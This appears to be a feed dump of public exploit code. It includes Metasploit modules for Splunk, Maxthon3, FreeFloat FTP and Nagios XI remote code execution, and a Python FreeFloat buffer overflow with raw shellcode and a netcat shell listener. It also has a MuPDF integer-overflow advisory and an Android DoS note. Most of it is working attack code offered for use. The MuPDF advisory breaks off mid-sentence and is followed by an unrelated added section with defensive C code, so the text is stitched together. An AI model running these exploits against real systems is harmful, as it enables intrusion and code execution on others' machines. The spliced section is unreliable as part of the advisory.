    @auth_cookies = ''
    @csrf_form_key = ''
    app_name = 'upload_app_exec'

    p = payload.encoded
    print_status("Using command: #{p}")
    cmd = Rex::Text.encode_base64(p)

    # log in to Splunk (if required)
    do_login

    # fetch the csrf token for use in the upload next
    do_get_csrf('/en-US/manager/launcher/apps/local')

    unless disable_upload
      # upload the arbitrary command execution Splunk app tgz
      do_upload_app(app_name, file_name)
    end

    # get the next csrf token from our new app
    do_get_csrf("/en-US/app/#{app_name}/flashtimeline")

    # call our command execution function with the Splunk 'script' command
    print_status("Invoking script command")
    res = send_request_cgi(
      {
        'uri'     => '/en-US/api/search/jobs',
        'method'  => 'POST',
        'cookie'  => @auth_cookies,
        'headers' =>
          {
            'X-Requested-With'  => 'XMLHttpRequest',
            'X-Splunk-Form-Key' => @csrf_form_key
          },
        'vars_post' =>
          {
            'search'              => "search * | script msf_exec #{cmd}", # msf_exec defined in default/commands.conf
            'status_buckets'      => "300",
            'namespace'           => "#{app_name}",
            'ui_dispatch_app'     => "#{app_name}",
            'ui_dispatch_view'    => "flashtimeline",
            'auto_cancel'         => "100",
            'wait'                => "0",
            'required_field_list' => "*",
            'adhoc_search_level'  => "smart",
            'earliest_time'       => "0",
            'latest_time'         => "",
            'timeFormat'          => "%s.%Q"
          }
      })

    if return_output
      res.body.match(/data":\ "([0-9.]+)"/)
      job_id = $1

      # wait a short time to let the output be produced
      print_status("Waiting for #{command_output_delay} seconds to retrieve command output")
      select(nil, nil, nil, command_output_delay)

      job_output = fetch_job_output(job_id)

      if job_output.body.match(/Waiting for data.../)
        print_status("No output returned in time")
      else
        output = ""
        job_output.body.each_line do |line|
          # strip off the leading and trailing " added by Splunk
          line.gsub!(/^"/, "")
          line.gsub!(/"$/, "")
          output << line
        end
        # return the output
        print_status("Command returned:")
        print_line output
      end
    else
      handler
    end
  end

  def check
    # all versions are actually "vulnerable" but check implemented for future proofing
    # and good practice
    res = send_request_cgi(
      {
        'uri'    => '/en-US/account/login',
        'method' => 'GET'
      }, 25)

    if res and res.body =~ /Splunk Inc\. Splunk/
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def do_login
    print_status("Authenticating...")
    # this method borrowed with thanks from splunk_mappy_exec.rb
    res = send_request_cgi(
      {
        'uri'    => '/en-US/account/login',
        'method' => 'GET'
      })

    cval = ''
    uid = ''
    session_id_port = session_id = ''

    if res and res.code == 200
      res.headers['Set-Cookie'].split(';').each { |c|
        c.split(',').each { |v|
          if v.split('=')[0] =~ /cval/
            cval = v.split('=')[1]
          elsif v.split('=')[0] =~ /uid/
            uid = v.split('=')[1]
          elsif v.split('=')[0] =~ /session_id/
            session_id_port = v.split('=')[0]
            session_id = v.split('=')[1]
          end
        }
      }
    else
      fail_with(Exploit::Failure::NotFound, "Unable to get session cookies")
    end

    res = send_request_cgi(
      {
        'uri'       => '/en-US/account/login',
        'method'    => 'POST',
        'cookie'    => "uid=#{uid}; #{session_id_port}=#{session_id}; cval=#{cval}",
        'vars_post' =>
          {
            'cval'     => cval,
            'username' => @username,
            'password' => @password
          }
      })

    if not res or res.code != 303
      fail_with(Exploit::Failure::NoAccess, "Unable to authenticate")
    else
      session_id_port = ''
      session_id = ''
      res.headers['Set-Cookie'].split(';').each { |c|
        c.split(',').each { |v|
          if v.split('=')[0] =~ /session_id/
            session_id_port = v.split('=')[0]
            session_id = v.split('=')[1]
          end
        }
      }
      @auth_cookies = "#{session_id_port}=#{session_id}"
    end
  end

  def do_upload_app(app_name, file_name)
    archive_file_name = ::File.basename(file_name)
    print_status("Uploading file #{archive_file_name}")
    file_data = ::File.open(file_name, "rb") { |f| f.read }

    boundary = '----------' + rand_text_alphanumeric(6)

    data = "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"splunk_form_key\"\r\n\r\n"
    data << "#{@csrf_form_key}"
    data << "\r\n--#{boundary}\r\n"

    if @enable_overwrite
      data << "Content-Disposition: form-data; name=\"force\"\r\n\r\n"
      data << "1"
      data << "\r\n--#{boundary}\r\n"
    end

    data << "Content-Disposition: form-data; name=\"appfile\"; filename=\"#{archive_file_name}\"\r\n"
    data << "Content-Type: application/x-compressed\r\n\r\n"
    data << file_data
    data << "\r\n#{boundary}\r\n"

    res = send_request_cgi({
      'uri'    => '/en-US/manager/appinstall/_upload',
      'method' => 'POST',
      'cookie' => @auth_cookies,
      'ctype'  => "multipart/form-data; boundary=#{boundary}",
      'data'   => data
    }, 30)

    if (res and (res.code == 303 or (res.code == 200 and res.body !~ /There was an error processing the upload/)))
      print_status("#{app_name} successfully uploaded")
    else
      fail_with(Exploit::Failure::Unknown, "Error uploading")
    end
  end

  def do_get_csrf(uri)
    print_status("Fetching csrf token from #{uri}")
    res = send_request_cgi(
      {
        'uri'    => uri,
        'method' => 'GET',
        'cookie' => @auth_cookies
      })

    fail_with(Exploit::Failure::Unknown, "No response while fetching csrf token") if not res
    res.body.match(/FORM_KEY":\ "(\d+)"/)
    @csrf_form_key = $1
    fail_with(Exploit::Failure::Unknown, "csrf form Key not found") if not @csrf_form_key
  end

  def fetch_job_output(job_id)
    # fetch the output of our job id as csv for easy parsing
    print_status("Fetching job_output for id #{job_id}")
    res = send_request_raw(
      {
        'uri'          => "/en-US/api/search/jobs/#{job_id}/result?isDownload=true&timeFormat=%25FT%25T.%25Q%25%3Az&maxLines=0&count=0&filename=&outputMode=csv&spl_ctrl-limit=unlimited&spl_ctrl-count=10000",
        'method'       => 'GET',
        'cookie'       => @auth_cookies,
        'encode_param' => 'false'
      })
  end
end

==> Maxthon3 about:history XCS Trusted Zone Code Execution PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Maxthon3 about:history XCS Trusted Zone Code Execution',
      'Description'    => %q{
          Cross Context Scripting (XCS) is possible in the Maxthon about:history page.
        Injection into such a privileged/trusted browser zone can be used to modify
        configuration settings and execute arbitrary commands. Please note this module
        only works against specific versions of Maxthon. Currently, we've only
        successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module
          'sinn3r',                 # msf module
          'juan vazquez'            # msf module
        ],
      'References'     =>
        [
          [ 'URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html' ]
        ],
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Maxthon 3 (prior to 3.3) on Windows', {} ]
        ],
      'DisclosureDate' => 'Nov 26 2012',
      'DefaultTarget'  => 0
    ))
  end

  def on_request_uri(cli, request)
    # Only serve the Maxthon 3 / WebKit 534.12 engine this injection was tested against.
    if request.headers['User-agent'] !~ /Maxthon\/3/ or request.headers['User-agent'] !~ /AppleWebKit\/534.12/
      print_status("Sending 404 for User-Agent #{request.headers['User-agent']}")
      send_not_found(cli)
      return
    end

    html_hdr = %Q|
      <html>
      <head>
      <title>Download</title>
    |

    html_ftr = %Q|
      </head>
      <body >
      <h1>Loading</h1>
      </body></html>
    |

    case request.uri
    when /\?jspayload/
      p = regenerate_payload(cli)
      if (p.nil?)
        send_not_found(cli)
        return
      end

      # We're going to run this through unescape(), so make sure
      # everything is encoded
      penc = generate_payload_exe
      penc2 = Rex::Text.encode_base64(penc)

      # This base64 encoded payload is passed to the file write API in Maxthon, and the
      # resulting file is then launched via the Program DOM API. Because of this only
      # Maxthon 3.1 versions are targeted: the Program DOM API isn't available on
      # Maxthon 3.2 and later.
      content = %Q|
        if(maxthon.program) {
          var fileTemp = new maxthon.io.File.createTempFile("test","exe");
          var fileObj = maxthon.io.File(fileTemp);
          maxthon.io.FileWriter(fileTemp);
          maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");
          maxthon.program.Program.launch(fileTemp.name_,"C:");
        }
      |

    when /\?history/
      # Second stage: navigate the browser into the trusted about:history page.
      js = %Q|
        window.onload = function() {
          location.href = "about:history";
        }
      |
      content = %Q|
        #{html_hdr}
        <script>
          #{js}
        </script>
        #{html_ftr}
      |

    when get_resource()
      # First stage: the history entry carries an injected <img onerror> that loads
      # the ?jspayload script inside the about:history context.
      print_status("Sending #{self.name} payload for request #{request.uri}")
      js = %Q|
        url = location.href;
        url2 = url + "?jspayload=1";
        inj = "?history#%22/><img src=a onerror=%22"
        inj_1 = "a=document.createElement('script');a.setAttribute('src','"+url2+"');document.body.appendChild(a);";
        window.location = unescape(inj) + inj_1;
      |
      content = %Q|
        #{html_hdr}
        <script>
          #{js}
        </script>
        #{html_ftr}
      |

    else
      print_status("Sending 404 for request #{request.uri}")
      send_not_found(cli)
      return
    end

    send_response_html(cli, content)
  end
end

==> FreeFloat FTP Server Arbitrary File Upload

http://rss.feedsportal.com/c/32479/f/477548/index.rss

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "FreeFloat FTP Server Arbitrary File Upload",
      'Description'    => %q{
          This module abuses multiple issues in FreeFloat: 1. No credential is actually
        needed to log in; 2. The user's default path is C:\, and this cannot be changed;
        3. The user can write anywhere on the server's file system. As a result of these
        poor implementations, a malicious user can simply log in, upload files, and let
        WMI (Windows Management Instrumentation) execute the uploaded payload.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'sinn3r',      # Vulnerability discovery, Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'URL', 'http://metasploit.com' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'FreeFloat', {} ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Dec 7 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        # Change the default description so this option makes sense
        OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])
      ], self.class)

    deregister_options('FTPUSER', 'FTPPASS') # Using empty user and password
  end

  def check
    connect
    disconnect

    if banner =~ /FreeFloat/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Active-mode data connection: the FTP server connects back to us and we
  # hand it whichever file the current stage calls for.
  def on_client_connect(cli)
    peer = "#{cli.peerhost}:#{cli.peerport}"

    case @stage
    when :exe
      print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)")
      cli.put(@exe)
      @stage = :mof
    when :mof
      print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)")
      cli.put(@mof)
    end

    cli.close
  end

  def upload(filename)
    select(nil, nil, nil, 1)
    peer = "#{rhost}:#{rport}"
    print_status("#{peer} - Trying to upload #{::File.basename(filename)}")

    conn = connect(false, datastore['VERBOSE'])

    print_status("#{peer} - Sending empty login...")
    res = send_user("", conn)
    if not res or res !~ /331/
      print_error("#{peer} - Error sending username")
      return false
    end

    res = send_pass("", conn)
    if not res or res !~ /230/
      print_error("#{peer} - Error sending password")
      return false
    end

    print_good("#{peer} - Empty authentication was successful")

    # Switch to binary mode
    print_status("#{peer} - Set binary mode")
    send_cmd(['TYPE', 'I'], true, conn)

    # Prepare active mode: Get attacker's IP and source port
    src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
    src_port = datastore['SRVPORT'].to_i

    # Prepare active mode: Convert the IP and port to the h1,h2,h3,h4,p1,p2 form PORT expects
    src_ip = src_ip.gsub(/\./, ',')
    src_port = "#{src_port/256},#{src_port.remainder(256)}"

    # Set to active mode
    print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"")
    send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

    # Tell the FTP server to download our file (the argument was lost in extraction;
    # the full path passed to upload() is what STOR needs, since the login lands in C:\)
    send_cmd(['STOR', filename], false, conn)
    disconnect(conn)

    true # exploit() uploads the MOF only if the executable upload returned truthy
  end

  def exploit
    exe_name = "WINDOWS/system32/#{rand_text_alpha(rand(10)+5)}.exe"
    mof_name = "WINDOWS/system32/wbem/mof/#{rand_text_alpha(rand(10)+5)}.mof"

    @mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
    @exe = generate_payload_exe
    @stage = :exe

    begin
      t = framework.threads.spawn("reqs", false) {
        # Upload our malicious executable
        u = upload(exe_name)

        # Upload the mof file
        upload(mof_name) if u

        register_file_for_cleanup("#{::File.basename(exe_name)}")
        register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
      }

      super
    ensure
      t.kill
    end
  end
end

==> Nagios XI Network Monitor Graph Explorer Component Command Injection

http://rss.feedsportal.com/c/32479/f/477548/index.rss

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Nagios XI Network Monitor Graph Explorer Component Command Injection",
      'Description'    => %q{
          This module exploits a vulnerability found in the 'Graph Explorer' component
        of Nagios XI Network Monitor. An authenticated user can execute system commands
        by injecting them into several parameters, such as visApi.php's 'host'
        parameter, which results in remote code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Daniel Compton <daniel.compton[at]ngssecure.com>', # Original discovery
          'sinn3r'
        ],
      'References'     =>
        [
          [ 'OSVDB', '83552' ],
          [ 'BID', '54263' ],
          [ 'URL', 'http://packetstormsecurity.org/files/118497/Nagios-XI-Network-Monitor-2011R1.9-OS-Command-Injection.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x0d\x0a",
          'Compat'   =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl python ruby bash telnet',
            }
        },
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Graph Explorer Component prior to 1.3', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Nov 30 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        # URI isn't registered, because this is set by the installer.
        OptString.new('USERNAME', [true, 'The username to login as', 'nagiosadmin']),
        OptString.new('PASSWORD', [true, 'The password to use'])
      ], self.class)
  end

  def check
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => '/nagiosxi/includes/components/graphexplorer/visApi.php'
    })

    if res and res.code == 404
      print_error("Remote host does not have Graph Explorer installed.")
    elsif res and res.body =~ /Your session has timed out/
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  # Fetch the anti-CSRF 'nsp' hidden field and the session cookie from the login page.
  def get_login_data
    res = send_request_cgi({'uri' => '/nagiosxi/login.php'})
    return '', '' if !res

    nsp = res.body.scan(/<input type='hidden' name='nsp' value='(.+)'>/).flatten[0] || ''
    cookie = (res.headers['Set-Cookie'] || '').scan(/nagiosxi=(\w+); /).flatten[0] || ''

    return nsp, cookie
  end

  def is_loggedin(cookie)
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => '/nagiosxi/index.php',
      'cookie' => "nagiosxi=#{cookie}"
    })

    if res and res.body =~ /Logged in as: <a href=".+">#{datastore['USERNAME']}<\/a>/
      return true
    else
      return false
    end
  end

  def login(nsp, cookie)
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => '/nagiosxi/login.php',
      'cookie'    => "nagiosxi=#{cookie}",
      'vars_post' => {
        'nsp'         => nsp,
        'page'        => 'auth',
        'debug'       => '',
        'pageopt'     => 'login',
        'username'    => datastore['USERNAME'],
        'password'    => datastore['PASSWORD'],
        'loginButton' => 'Login'
      },
      'headers' => {
        'Origin'  => "http://#{rhost}",
        'Referer' => "http://#{rhost}/nagiosxi/login.php"
      }
    })

    return is_loggedin(cookie)
  end

  def exploit
    nsp, cookie = get_login_data
    if nsp.empty?
      print_error("Unable to retrieve hidden value 'nsp'")
      return false
    end

    if login(nsp, cookie)
      print_status("Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
    else
      print_error("Failed to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
      return
    end

    # The 'host' value is interpolated into a shell command; backticks run the payload.
    print_status("Sending Command injection")
    send_request_cgi({
      'method'   => 'GET',
      'uri'      => '/nagiosxi/includes/components/graphexplorer/visApi.php',
      'cookie'   => "nagiosxi=#{cookie}",
      'vars_get' => {
        'type'    => 'stack',
        'host'    => "localhost`#{payload.encoded}`",
        'service' => 'Swap_Usage',
        'div'     => 'visContainer1566841654',
        'opt'     => 'days'
      }
    })
  end
end

==> Free Float FTP Server USER Command Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss

#!/usr/bin/python
# Exploit title: FreeFloat FTP Server Remote Command Execution USER Command Buffer Overflow
# Date: 06/12/2012
# Exploit Author: D35m0nd142
# Vendor Homepage: http://www.freefoat.com
# Tested on Windows XP SP3 with Ubuntu 12.04

import socket, sys, time, os
import Tkinter, tkMessageBox

os.system("clear")

def exploit():
    target = ip.get()
    junk = "\x41" * 230        # Offset --> 230
    eip = "\x53\x93\x37\x7E"   # 0x7E379353 FFE4 JMP ESP
    nops = "\x90" * 20
    payload = ("\xb8\xe9\x78\x9d\xdb\xda\xd2\xd9\x74\x24\xf4\x5e\x2b\xc9" +
               "\xb1\x4f\x31\x46\x14\x83\xc6\x04\x03\x46\x10\x0b\x8d\x61" +
               "\x33\x42\x6e\x9a\xc4\x34\xe6\x7f\xf5\x66\x9c\xf4\xa4\xb6" +
               "\xd6\x59\x45\x3d\xba\x49\xde\x33\x13\x7d\x57\xf9\x45\xb0" +
               "\x68\xcc\x49\x1e\xaa\x4f\x36\x5d\xff\xaf\x07\xae\xf2\xae" +
               "\x40\xd3\xfd\xe2\x19\x9f\xac\x12\x2d\xdd\x6c\x13\xe1\x69" +
               "\xcc\x6b\x84\xae\xb9\xc1\x87\xfe\x12\x5e\xcf\xe6\x19\x38" +
               "\xf0\x17\xcd\x5b\xcc\x5e\x7a\xaf\xa6\x60\xaa\xfe\x47\x53" +
               "\x92\xac\x79\x5b\x1f\xad\xbe\x5c\xc0\xd8\xb4\x9e\x7d\xda" +
               "\x0e\xdc\x59\x6f\x93\x46\x29\xd7\x77\x76\xfe\x81\xfc\x74" +
               "\x4b\xc6\x5b\x99\x4a\x0b\xd0\xa5\xc7\xaa\x37\x2c\x93\x88" +
               "\x93\x74\x47\xb1\x82\xd0\x26\xce\xd5\xbd\x97\x6a\x9d\x2c" +
               "\xc3\x0c\xfc\x38\x20\x22\xff\xb8\x2e\x35\x8c\x8a\xf1\xed" +
               "\x1a\xa7\x7a\x2b\xdc\xc8\x50\x8b\x72\x37\x5b\xeb\x5b\xfc" +
               "\x0f\xbb\xf3\xd5\x2f\x50\x04\xd9\xe5\xf6\x54\x75\x56\xb6" +
               "\x04\x35\x06\x5e\x4f\xba\x79\x7e\x70\x10\x0c\xb9\xe7\x5b" +
               "\xa7\x44\x78\x33\xba\x46\x69\x98\x33\xa0\xe3\x30\x12\x7b" +
               "\x9c\xa9\x3f\xf7\x3d\x35\xea\x9f\xde\xa4\x71\x5f\xa8\xd4" +
               "\x2d\x08\xfd\x2b\x24\xdc\x13\x15\x9e\xc2\xe9\xc3\xd9\x46" +
               "\x36\x30\xe7\x47\xbb\x0c\xc3\x57\x05\x8c\x4f\x03\xd9\xdb" +
               "\x19\xfd\x9f\xb5\xeb\x57\x76\x69\xa2\x3f\x0f\x41\x75\x39" +
               "\x10\x8c\x03\xa5\xa1\x79\x52\xda\x0e\xee\x52\xa3\x72\x8e" +
               "\x9d\x7e\x37\xbe\xd7\x22\x1e\x57\xbe\xb7\x22\x3a\x41\x62" +
               "\x60\x43\xc2\x86\x19\xb0\xda\xe3\x1c\xfc\x5c\x18\x6d\x6d" +
               "\x09\x1e\xc2\x8e\x18")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((target, 21))
        print "\n\n[-] Sending exploit ..."
        print sock.recv(2000)
        # Overflow the USER argument: padding, JMP ESP address, NOP sled, shellcode
        sock.send("USER " + junk + eip + nops + payload + "\r\n")
        sock.close()
        # Catch the bind shell on port 4444
        os.system("nc -lvp 4444")
    except:
        print "[-] Connection to " + target + " failed! \n"
        sys.exit(0)

root = Tkinter.Tk()
root.geometry("%dx%d" % (700, 375))
root.title("*** FreeFloat FTP Server Remote Code Execution USER Command Buffer Overflow***")
root['bg'] = 'black'
developer = Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom')
ip_answer = Tkinter.Label(text="IP Address ").pack()
ip = Tkinter.StringVar()
ip_entry = Tkinter.Entry(textvariable=ip).pack()
exploit_button = Tkinter.Button(text="Exploit", command=exploit).pack()
root.mainloop()

==> Sumatra 2.1.1/MuPDF 1.0 Integer Overflow

http://rss.feedsportal.com/c/32479/f/477548/index.rss Sumatra 2.1.1/MuPDF 1.0 Integer Overflow

There is an integer overflow in MuPDF's lex_number() function which can be triggered using a corrupt PDF file with an ObjStm. I'm attaching a file that reproduces the problem with the original unmodified file; the ObjStm was modified to include big numbers. The easy fix is to update to the latest version of the MuPDF library.

Affected products
=================
MuPDF 1.0 (previous release)
MuPDF for iOS 1.1 (current release)
Sumatra 2.1.1 (current stable release)

Fixed
=====
MuPDF 1.1
http://git.ghostscript.com/?p=mupdf.git;a=commitdiff;h=f919270b6a732ff45c3ba2d0c105e2b39e9c9bc9
Sumatra Pre-release version: http://blog.kowalczyk.info/software/sumatrapdf/prerelease.html

CVE
===
CVE-2012-5340

Flaw details
============
On the FIXME line an integer overflow occurs, which can later be abused to write to memory:

File: pdf_lex.c

static int
lex_number(fz_stream *f, pdf_lexbuf *buf, int c)
{
	.....
	while (1)
	{
		int c = fz_read_byte(f);
		switch (c)
		{
		case '.':
			goto loop_after_dot;
		case RANGE_0_9:
			i = 10*i + c - '0';
			/* FIXME: Need overflow check here; do we care? */
			break;
		default:
			fz_unread_byte(f);
			/* Fallthrough */
		case EOF:
			if (neg)
				i = -i;
			buf->i = i;
			return PDF_TOK_INT;
		}
	}
	....

File: pdf_repair.c

static void
pdf_repair_obj_stm(pdf_document *xref, int num, int gen)
{
	....
	for (i = 0; i < count; i++)
	{
		tok = pdf_lex(stm, &buf);
		if (tok != PDF_TOK_INT)
			fz_throw(ctx, "corrupt object stream (%d %d R)", num, gen);

		n = buf.i; // n can take negative values when an integer overflow occurs
		if (n >= xref->len)
			pdf_resize_xref(xref, n + 1);

		xref->table[n].ofs = num; // Writes
		xref->table[n].gen = i;
		xref->table[n].stm_ofs = 0;
	....

POC
===
Attached proof of concept.
http://www.exploit-db.com/sploits/23246.tar.gz

!Exploitable output
===================
MuPDF:

Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at mupdf+0x000000000003e1a6 (Hash=0x0e1a1f61.0x5f702654)
User mode write access violations that are not near NULL are exploitable.

Sumatra:

SumatraPDF!pdf_repair_obj_stms+0x94
SumatraPDF!pdf_open_document_with_stream+0x2c3
SumatraPDF!PdfEngineImpl::LoadFromStream+0xaa
SumatraPDF!PdfEngineImpl::Load+0x179
SumatraPDF!PdfEngine::CreateFromFile+0x80
SumatraPDF!EngineManager::CreateEngine+0x82
SumatraPDF!LoadDocIntoWindow+0x266
SumatraPDF!LoadDocumentOld+0x41f
SumatraPDF!LoadDocument+0xc
SumatraPDF!LoadOnStartup+0x89
SumatraPDF!WinMain+0x57c
SumatraPDF!__tmainCRTStartup+0x142
SumatraPDF!WinMainCRTStartup+0xf
kernel32!BaseThreadInitThunk+0x12
ntdll32!RtlInitializeExceptionChain+0x63
ntdll32!RtlInitializeExceptionChain+0x36

Instruction Address: 0x00000000775315de
Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll32!ZwRaiseException+0x0000000000000012 (Hash=0x16621b14.0x14396738)
User mode write access violations that are not near NULL are
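The FIXME in lex_number() and the unchecked index in pdf_repair_obj_stm() are two halves of the same bug: the lexer lets a long digit string wrap into a negative int, and the repair loop then uses that int as a table index. The C program below is an added example, not MuPDF code. It shows the overflow check the comment asks for (refusing to compute 10*i + d once the result could exceed INT_MAX, so no signed overflow is ever evaluated) and the index validation the repair loop needs. The function names, the flat int table standing in for the xref, and the space-separated object streams are assumptions for illustration; the model rejects out-of-range indexes rather than resizing the table as MuPDF does.

```c
#include <limits.h>
#include <stdio.h>

typedef enum { TOK_INT, TOK_OVERFLOW, TOK_ERROR } tok_t;

/* Lex an optionally signed decimal integer from s, stopping at the first
 * non-digit. Unlike the MuPDF 1.0 loop (i = 10*i + c - '0', unchecked), this
 * refuses to accumulate a value that would not fit in an int. On success
 * *end points just past the digits so a caller can keep tokenising. */
tok_t lex_number_checked(const char *s, int *out, const char **end)
{
    int neg = 0;
    int i = 0;

    if (*s == '-') { neg = 1; s++; }
    else if (*s == '+') { s++; }
    if (*s < '0' || *s > '9')
        return TOK_ERROR;

    for (; *s >= '0' && *s <= '9'; s++) {
        int d = *s - '0';
        /* Equivalent to 10*i + d <= INT_MAX, tested without overflowing. */
        if (i > (INT_MAX - d) / 10)
            return TOK_OVERFLOW;
        i = 10 * i + d;
    }
    if (end)
        *end = s;
    *out = neg ? -i : i;   /* magnitudes up to INT_MAX only; INT_MIN itself is refused */
    return TOK_INT;
}

/* Model of the repaired object-stream walk: each number in the stream is an
 * object number used as an index into the xref table. Returns the number of
 * entries written, or -1 for a corrupt stream (non-integer token, overflow,
 * or a negative / out-of-range index). table[n] stands in for
 * xref->table[n].ofs, and stm_num for the containing stream's object number. */
int repair_obj_stm_checked(const char *stream, int count, int *table,
                           int table_len, int stm_num)
{
    const char *p = stream;
    for (int k = 0; k < count; k++) {
        int n;
        const char *end;
        while (*p == ' ')
            p++;
        if (lex_number_checked(p, &n, &end) != TOK_INT)
            return -1;
        if (n < 0 || n >= table_len)   /* the bound the original loop lacked */
            return -1;
        table[n] = stm_num;
        p = end;
    }
    return count;
}

int main(void)
{
    int v;
    int table[16] = {0};
    /* Constructed inputs: the last two are the shape the malformed ObjStm carries. */
    const char *samples[] = { "2147483647", "-17", "2147483648", "99999999999", "x" };

    for (int k = 0; k < 5; k++) {
        tok_t t = lex_number_checked(samples[k], &v, NULL);
        if (t == TOK_INT)
            printf("%-12s -> %d\n", samples[k], v);
        else
            printf("%-12s -> %s\n", samples[k], t == TOK_OVERFLOW ? "overflow" : "error");
    }
    printf("repair \"3 7 15\"        -> %d\n", repair_obj_stm_checked("3 7 15", 3, table, 16, 99));
    printf("repair \"3 99999999999\" -> %d\n", repair_obj_stm_checked("3 99999999999", 2, table, 16, 99));
    return 0;
}
```

Either check alone would have stopped the write in the advisory's trace: with the lexer fix the corrupt ObjStm is rejected as a non-integer token, and with the index check a negative n can no longer reach xref->table[n]. A real repair path that grows the table should still cap the growth, since an attacker-chosen n close to INT_MAX turns pdf_resize_xref into a multi-gigabyte allocation.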

==> Android Kernel 2.6 Local DoS Crash PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss

# Exploit Title: Android Kernel 2.6 Local DoS
# Date: 12/7/12
# Author: G13
# Twitter: @g13net
# Versions: Android 2.2, 2.3
# Category: DoS (android)
#

##### Vulnerability #####

The Android OS is vulnerable to a local DoS when a filename with a length of 2048 or larger is written to the sdcard (vfat fs) multiple times. A successful run of the exploit code results in the system restarting. The vulnerability only affects Android kernels in the 2.6 family.

##### Vendor Timeline #####

The Android Security Team has been contacted with updated PoC code and details. They have been aware of this vulnerability for over a year.

##### Tombstone #####

* * * * * * * * * * * * * * * *
Build fingerprint: 'verizon/SCH-I800/SCH-I800:2.3.4/GINGERBREAD/EF01:user/release-keys'
pid: 349, tid: 363, name: SensorService  >>> system_server <<<
signal 8 (SIGFPE), code -6 (?), fault addr 0000015d
    r0 00000000  r1 00000008  r2 00000040  r3 00000000
    r4 2a114310  r5 00000000  r6 51504690  r7 00000025
    r8 2a114330  r9 2a114350  sl 00000003  fp 00000003
    ip fffd4084  sp 51501eb0  lr 40039b70  pc 40037cf0  cpsr 20030010
    d0  4271bc7bd0b80000  d1  0000000000000000
    d2  0000000000000000  d3  427181eae9200000
    d4  0000000000000000  d5  0000000000000000
    d6  0000000000000000  d7  0000000000000000
    d8  0000000000000000  d9  0000000000000000
    d10 0000000000000000  d11 0000000000000000
    d12 0000000000000000  d13 0000000000000000
    d14 0000000000000000  d15 0000000000000000
    d16 3fe99999a0000000  d17 3fe999999999999a
    d18 0033003200310030  d19 0000000000000000
    d20 3fc554e7eb0eb47c  d21 3e66376972bea4d0
    d22 3f4de16b9c24a98f  d23 3fb0f4a31edab38b
    d24 3fede16b9c24a98f  d25 3fe55559ee5e69f9
    d26 0000000000000000  d27 0000000000000000
    d28 0000000000000005  d29 0000000000000000
    d30 0000000000000000  d31 0000000000000000
    scr 20000010

backtrace:
    #00  pc 0000dcf0  /system/lib/libc.so (kill+12)
